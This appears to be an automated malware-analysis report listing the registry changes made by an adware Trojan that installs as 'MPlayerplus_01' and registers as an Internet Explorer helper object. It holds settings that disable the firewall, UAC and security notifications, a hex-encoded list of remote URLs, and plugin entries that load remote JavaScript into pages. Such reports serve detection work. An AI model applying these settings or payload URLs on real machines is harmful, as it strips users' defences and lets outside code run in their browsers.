"43014726" = "0A00687474703A2F2F63616465732E636F6D2E61722F696D616765732F6C6F676F2E67696600687474703A2F2F636576697A74762E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F746861692D736B796C696768742E636F6D2F627574746F6E2E67696600687474703A2F2F636F726573646162616869612E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F736D6F6B696E2D74722E636F6D2F6173736574732F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E62756572676572666573742D6772616566656E626572672E64652F6C6F676F2E67696600687474703A2F2F77696E676D616B657273686F70652E7A612E706C2F696D616765732F627574746F6E2E67696600687474703A2F2F77656C6C73736D616C6C2E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E75656873692E64652F6C6F676F2E67696600687474703A2F2F686F74656C697370622E686F702E72752F696D6167652F6C6F676F2E676966"

[HKCU\Software\Aas\695404737]
"21507363" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas]

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"

[HKCU\Software\Aas\695404737]
"50183847" = "6CB4F357E15540EBCF387CD502BE18BB83B2095EA6EE884B0D059449A5342D68E3B2D27FB714B9250509608EC3DEB7EEA20A33E26D97C5486AA270018FFA46A16EE0AF4EE22779AE1BD1BBA23B356C014518440564740352676BB249C23112961C700B388C12E7360016EE2DAFC09E2689A619CC82C6AA0421112571C15FFB27"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"

[HKCU\Software\Aas\695404737]
"35845605" = "392"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas\695404737]
"14338242" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

Adds a rule to the Windows firewall that allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"

The process regsvr32.exe:2736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"

[HKCR\CrossriderApp0054246.Sandbox.1]
"(Default)" = "CrossriderApp0054246.Sandbox"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories]
"(Default)" = ""

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"

[HKCR\CrossriderApp0054246.Sandbox\CurVer]
"(Default)" = "CrossriderApp0054246.Sandbox"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\0\win32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}]
"(Default)" = "MPlayerplus_01"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CrossriderApp0054246.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421146}"

[HKCR\CrossriderApp0054246.BHO\CurVer]
"(Default)" = "CrossriderApp0054246"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\ProgID]
"(Default)" = "CrossriderApp0054246.BHO.1"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0]
"(Default)" = "CrossriderApp0054246 Type Library"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054246.Sandbox"

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440544424446}"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\VersionIndependentProgID]
"(Default)" = "CrossriderApp0054246"

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}]
"(Default)" = "ISandBox"

[HKCR\TypeLib\{44444444-4444-4444-4444-440544424446}\1.0\HELPDIR]
"(Default)" = "%Program Files%\MPlayerplus_01"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\ProgID]
"(Default)" = "CrossriderApp0054246.Sandbox.1"

[HKCR\Interface\{66666666-6666-6666-6666-660566426646}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CrossriderApp0054246.BHO]
"(Default)" = "CrossriderApp0054246"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CrossriderApp0054246.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422246}"

[HKCR\CrossriderApp0054246.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110511421146}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 7A 5B 03 6F 08 2D F2 01 06 02 6B 4F 62 64 84"

[HKCR\CrossriderApp0054246.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220522422246}"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
"(Default)" = "%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll"

[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}]
"(Default)" = "CrossriderApp0054246.Sandbox"

[HKCR\CrossriderApp0054246.BHO.1]
"(Default)" = "CrossriderApp0054246"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}]
"(Default)" = "ICrossriderBHO"

[HKCR\Interface\{55555555-5555-5555-5555-550555425546}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CrossriderApp0054246.Sandbox]
"(Default)" = "CrossriderApp0054246.Sandbox"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421146}]
"(Default)" = "CrossriderApp0054246"
"NoExplorer" = "1"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110511421146}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110511421146}]
[HKCR\CLSID\{22222222-2222-2222-2222-220522422246}\TypeLib]

The process dwwin.exe:3088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 82 33 8A 31 08 97 0D FF DB BB 2B F9 71 E3 4F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MPlayerplus_01-codedownloader.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\MPlayerplus_01\Plugins\246]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/246.js"

[HKCU\Software\MPlayerplus_01\Plugins\43]
"Name" = "IEMessaging"

[HKCU\Software\MPlayerplus_01\Plugins\17]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\41]
"Name" = "IEInfo"

[HKCU\Software\MPlayerplus_01\Plugins\192]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/192.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\MPlayerplus_01\Plugins\9]
"Name" = "search_engine_hook"

[HKCU\Software\MPlayerplus_01\Manifest]
"AddressbarURL" = "NA"

[HKCU\Software\MPlayerplus_01\Plugins\44]
"Version" = "6"

[HKCU\Software\MPlayerplus_01\Plugins\13]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/13.js"

[HKCU\Software\MPlayerplus_01\Plugins\78]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/78.js"

[HKCU\Software\MPlayerplus_01\Plugins\262]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\246]
"Version" = "15"

[HKCU\Software\MPlayerplus_01\Plugins\281]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/281.js"

[HKCU\Software\MPlayerplus_01\Plugins\4]

[HKCU\Software\MPlayerplus_01\Plugins\46]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\4]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64"

[HKCU\Software\MPlayerplus_01\Plugins\40]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\223]
"Name" = "imonomy_m"

[HKCU\Software\MPlayerplus_01\Plugins\246]
"JavaScript" = "var _0x4cfc=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""

[HKCU\Software\MPlayerplus_01\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3"

[HKCU\Software\MPlayerplus_01\Plugins\17]
"Name" = "jQuery"

[HKCU\Software\MPlayerplus_01\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"

[HKCU\Software\MPlayerplus_01\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

[HKCU\Software\MPlayerplus_01\Plugins\3]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/3.js"

[HKCU\Software\MPlayerplus_01\Plugins\35]
"Name" = "IEAjax"

[HKCU\Software\MPlayerplus_01\Manifest]
"BgVersion" = "2"

[HKCU\Software\MPlayerplus_01\Plugins\38]

[HKCU\Software\MPlayerplus_01\Plugins\4]
"URL" = "http://js.newdatastatsserv.com/plugins/javascripts/jquery-1_7_1_min.js"

[HKCU\Software\MPlayerplus_01\Plugins\17]

[HKCU\Software\MPlayerplus_01\Plugins\37]

[HKCU\Software\MPlayerplus_01\Plugins\7]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/7.js"

[HKCU\Software\MPlayerplus_01\Plugins\37]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/37.js"

[HKCU\Software\MPlayerplus_01\Plugins\180]
"Version" = "12"

[HKCU\Software\MPlayerplus_01\Plugins\94]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/94.js"

[HKCU\Software\MPlayerplus_01\Plugins\14]

[HKCU\Software\MPlayerplus_01\Plugins\233]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/233.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\MPlayerplus_01\Plugins\42]
"Name" = "IEInternal"

[HKCU\Software\MPlayerplus_01\Plugins\226]
"URL" = "http://js.newdatastatsserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js"

[HKCU\Software\MPlayerplus_01\Plugins\253]
"Version" = "1"

[HKCU\Software\MPlayerplus_01\Plugins\289]
"Version" = "1"

[HKCU\Software\MPlayerplus_01\Plugins\78]

[HKCU\Software\MPlayerplus_01\Plugins\64]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\MPlayerplus_01\Plugins\41]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

[HKCU\Software\MPlayerplus_01\Plugins\230]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/230.js"

[HKCU\Software\MPlayerplus_01\Plugins\42]
"Version" = "10"

[HKCU\Software\MPlayerplus_01\Plugins\226]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,47,94"

[HKCU\Software\MPlayerplus_01\Plugins\78]
"Name" = "CrossriderInfo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\MPlayerplus_01\Plugins\246]
"Name" = "setup"

[HKCU\Software\MPlayerplus_01\Manifest]
"RunInFrame" = "false"

[HKCU\Software\MPlayerplus_01\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,7,9,93,102,104,180,184,192,220,195,211,221,223,230,233,242,244,253,260,262,263,273,275,281,286,289,91"

[HKCU\Software\MPlayerplus_01\Plugins\94]
"Name" = "IEPopup"

[HKCU\Software\MPlayerplus_01\Code]
"AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { //alert(appAPI.isMatchPages(*youtube*)); //alert(appAPI.isMatchPages(*watch*)); //alert(appAPI.isMatchPages(*hd=1*)) if (appAPI.isMatchPages(*youtube*) && appAPI.isMatchPages(*watch*) && !appAPI.isMatchPages(*hd=1*)) { //alert(window.location); window.location = window.location &hd=1"

[HKCU\Software\MPlayerplus_01\Plugins\47]
"Name" = "resources_background"

[HKCU\Software\MPlayerplus_01\Plugins\221]
"Name" = "icm_downloads_m"

[HKCU\Software\MPlayerplus_01\Plugins\47]
"Version" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\MPlayerplus_01\Plugins\223]
"Version" = "8"

[HKCU\Software\MPlayerplus_01\Plugins\260]
"Name" = "pricedetect_sidebar_m"

[HKCU\Software\MPlayerplus_01\Plugins\269]
"Name" = "stats_ie"

[HKCU\Software\MPlayerplus_01\Debug]
"IsDebuggingPlugins" = "0"

[HKCU\Software\MPlayerplus_01\Plugins\35]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\102]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/102.js"

[HKCU\Software\MPlayerplus_01\Plugins\195]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/195.js"

[HKCU\Software\MPlayerplus_01\Plugins\93]
"Version" = "13"

[HKCU\Software\MPlayerplus_01\Plugins\242]
"Name" = "price_gong_m"

[HKCU\Software\MPlayerplus_01\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\MPlayerplus_01\Plugins\94]
"Version" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\91]
"Version" = "85"

[HKCU\Software\MPlayerplus_01\Plugins\14]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/14.js"

[HKCU\Software\MPlayerplus_01\Plugins\2]
"Name" = "ie8_fix_1"

[HKCU\Software\MPlayerplus_01\Plugins\3]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\MPlayerplus_01\Plugins\36]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/36.js"

[HKCU\Software\MPlayerplus_01\Plugins\262]
"Name" = "pops_5_j_m"

[HKCU\Software\MPlayerplus_01\Plugins\230]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Plugins\14]
"Version" = "11"

[HKCU\Software\MPlayerplus_01\Plugins\3]
"Version" = "2"

[HKCU\Software\MPlayerplus_01\Manifest]
"homepageurl" = "NA"

[HKCU\Software\MPlayerplus_01\Plugins\9]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/9.js"

[HKCU\Software\MPlayerplus_01\Plugins\91]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/91.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\MPlayerplus_01\Plugins\39]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/39.js"

[HKCU\Software\MPlayerplus_01\Plugins\38]
"Name" = "IECallbacks"

[HKCU\Software\MPlayerplus_01\Plugins\43]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\221]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Manifest]
"ModeType" = "production"
"PluginsManifestVersion" = "93"

[HKCU\Software\MPlayerplus_01\Plugins\45]
"Name" = "IEOnRequest"

[HKCU\Software\MPlayerplus_01\Plugins\275]
"Version" = "3"

[HKCU\Software\MPlayerplus_01\Plugins\184]
"Version" = "10"

[HKCU\Software\MPlayerplus_01\Plugins\64]
"Name" = "appApiMessage"

[HKCU\Software\MPlayerplus_01\Plugins\36]
"Name" = "IEBackground"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA D4 DD 75 CB 86 A0 31 8F A3 75 ED 89 8F 72 10"

[HKCU\Software\MPlayerplus_01\Plugins]
"BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64"

[HKCU\Software\MPlayerplus_01\Plugins\211]
"Version" = "7"

[HKCU\Software\MPlayerplus_01\Plugins\39]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\64]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/64.js"

[HKCU\Software\MPlayerplus_01\Plugins\9]
"Version" = "3"

[HKCU\Software\MPlayerplus_01\Plugins\3]
"Name" = "ie8_fix_2"

[HKCU\Software\MPlayerplus_01\Plugins\14]
"Name" = "CrossriderUtils"

[HKCU\Software\MPlayerplus_01\Plugins\39]
"Name" = "IEDatabase"

[HKCU\Software\MPlayerplus_01\Plugins\281]
"Name" = "ibario_tier3_pops_m"

[HKCU\Software\MPlayerplus_01\Plugins\273]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/273.js"

[HKCU\Software\MPlayerplus_01\Plugins\220]
"Version" = "23"

[HKCU\Software\MPlayerplus_01\Manifest]
"EnableSearchIE" = "false"

[HKCU\Software\MPlayerplus_01\Plugins\44]
"Name" = "IEMisc"

[HKCU\Software\MPlayerplus_01\Plugins\93]
"Name" = "superfish_no_coupons_m"

[HKCU\Software\MPlayerplus_01\Plugins\40]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/40.js"

[HKCU\Software\MPlayerplus_01\Plugins\93]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/93.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\MPlayerplus_01\Plugins\7]
"Name" = "hooks"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\MPlayerplus_01\Plugins\230]
"Name" = "revizer_ws_dynamic_b2b_2_m"

[HKCU\Software\MPlayerplus_01\Plugins\184]
"Name" = "noproblemppc_m"

[HKCU\Software\MPlayerplus_01\Plugins\263]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/263.js"

[HKCU\Software\MPlayerplus_01\Plugins\180]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/180.js"

[HKCU\Software\MPlayerplus_01\Plugins\260]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/260.js"

[HKCU\Software\MPlayerplus_01\Plugins\2]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/2.js"

[HKCU\Software\MPlayerplus_01\Manifest]
"Version" = "102"

[HKCU\Software\MPlayerplus_01\Plugins\184]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/184.js"

[HKCU\Software\MPlayerplus_01\Plugins\38]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\286]
"Name" = "sp_j_m"

[HKCU\Software\MPlayerplus_01\Plugins\223]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/223.js"

[HKCU\Software\MPlayerplus_01\Plugins\192]
"Version" = "9"

[HKCU\Software\MPlayerplus_01\Plugins\242]
"Version" = "4"

[HKCU\Software\MPlayerplus_01\Plugins\41]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/41.js"

[HKCU\Software\MPlayerplus_01\Plugins\221]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

[HKCU\Software\MPlayerplus_01\Plugins\244]
"Name" = "engageya_inner_m"

[HKCU\Software\MPlayerplus_01\Manifest]
"SetNewTab" = "false"
"Manifest" = "NA"

[HKCU\Software\MPlayerplus_01\Plugins\40]
"Name" = "IEExtension"

[HKCU\Software\MPlayerplus_01\Plugins\102]
"Version" = "10"

[HKCU\Software\MPlayerplus_01\Plugins\78]
"Version" = "5"

[HKCU\Software\MPlayerplus_01\Plugins\233]
"Name" = "revizer_p_dynamic_b2b_2_m"

[HKCU\Software\MPlayerplus_01\Plugins\195]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[195]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(195,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:LITE}))();};"

[HKCU\Software\MPlayerplus_01\Plugins\45]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/45.js"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\MPlayerplus_01\Plugins\226]
"Name" = "set_campaign_id_m"

[HKCU\Software\MPlayerplus_01\Plugins\44]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/44.js"

[HKCU\Software\MPlayerplus_01\Plugins\244]
"URL" = "http://js.newdatastatsserv.com/plugins/mins/244.js"

[HKCU\Software\MPlayerplus_01\Plugins\104]
"Name" = "jollywallet_m"

[HKCU\Software\MPlayerplus_01\Plugins\263]
"Name" = "intext_5_j_m"

[HKCU\Software\MPlayerplus_01\Manifest]
"ThanksUrl" = "NA"
"UninstallerOfferUrl" = "NA"

[HKCU\Software\MPlayerplus_01\Plugins\7]
